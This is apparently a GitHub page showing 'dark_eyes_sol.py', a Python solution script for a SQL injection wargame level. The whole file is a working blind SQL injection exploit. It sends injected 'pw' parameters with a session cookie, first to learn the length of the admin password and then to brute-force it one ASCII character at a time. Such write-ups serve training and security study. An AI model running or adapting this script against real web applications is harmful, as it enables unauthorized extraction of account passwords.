-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathdark_eyes_sol.py
46 lines (37 loc) · 1.17 KB
/
dark_eyes_sol.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
import requests
import urllib
import urllib3
pw = ""
length = 0
url = "YOUR_URL"
session = dict(PHPSESSID = "YOUR_SESSION_ID")
# find length
print("[*] Finding Length...")
for i in range(0, 100):
try:
query = url + "?pw=' or id='admin' and (length(pw)="
query = query + str(i) + " or (select 1 union select pw))%23"
r = requests.post(query, cookies=session)
except:
print ("[-] An error occurred, shutting down...")
exit()
if "query" in r.text:
length = i
break
print("[+] Length found: ", length)
# find password
print("[*] Finding password... (Brute-forcing may take awhile)")
for i in range(0, length + 1):
for j in range(48, 128): #ASCII
try:
query = url + "?pw=' or id='admin' and (ascii(substr(pw," + str(i) + ",1))="
query = query + str(j) + " or (select 1 union select pw))%23"
r = requests.post(query, cookies=session)
except:
print ("[-] An error occurred, shutting down...")
exit()
if "query" in r.text:
pw = pw + chr(j)
print("[+] ", pw)
break
print("[+] Password found: ", pw)